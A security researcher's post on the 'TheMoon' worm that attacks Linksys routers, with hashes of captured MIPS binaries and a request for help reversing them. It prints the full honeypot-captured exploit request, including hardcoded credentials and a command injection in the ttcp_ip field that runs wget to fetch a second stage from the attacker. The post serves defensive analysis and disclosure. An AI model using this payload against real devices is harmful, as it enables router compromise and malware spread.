Linksys Worm ("TheMoon") Captured
Assistance needed:
- If you have a vulnerable device that is infected, we could use full packet captures from that device. I am still trying to find out more about the command and control channel (if it exists).
- if you have experience reverse engineering MIPS malware, ask me for a sample (use the contact form.)
One important update: This affects other Linksys routers as well. For example, we do have some routers conecting to the honeypot that identify themselves as E2500 (Firmware 1.0.03 build 4)
Finally our honeypot did capture something that looks like it is responsible for the scanning activity we see:
The initial request, as discussed earlier, is:
POST /[withheld].cgi HTTP/1.1 Host: [ip of honeypot]:8080 User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ip of honeypot]:8080/ Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH <- username: admin password: &i1*@U$6xvcG (still trying to figure out the significance of this password) Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 518 %73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63 %74%69%6f%6e%3d&%73%75%62%6d%69%74%5f%74%79%70%65%3d&%61%63%74%69%6f %6e%3d&%63%6f%6d%6d%69%74%3d%30&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74 %63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63 %64%20%2f%74%6d%70%3b%69%66%20%5b%20%21%20%2d%65%20%2e%4c%32%36%20 %5d%3b%74%68%65%6e%20%77%67%65%74%20%68%74%74%70%3a%2f%2f%xx%xx%2e %xx%xx%xx%2e%xx%xx%xx%2e%xx%xx%xx%3a%31%39%33%2f%30%52%78%2e%6d%69 %64%3b%66%69%60&%53%74%61%72%74%45%50%49%3d%31
submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2 &ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi` &StartEPI=1
So it looks like it will try to download a "second stage" from port 193 from the attacking router. The ".L26" file appears to be a lock file to prevent multiple exploitation.
I am withholding the full URL for now until I can figure out if there is a patch or if this is a public/known exploit.
The port appears to change but is always < 1024. The second stage binary si always three letters and then a "random" extension.
Here are the MD5s of some of the binaries I retrieved so far. They are ELF binaries . If anybody would like to assist in reversing them, please contact me for a sample.
d9547024ace9d91037cbeee5161df33e 0dQ.png
a85e4a90a7b303155477ee1697995a43 Dsn.raw
88a5c5f9c5de5ba612ec96682d61c7bb EXr.pdf
ef19de47b051cb01928cab1a4f3eaa0e Osn.asc
file type: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter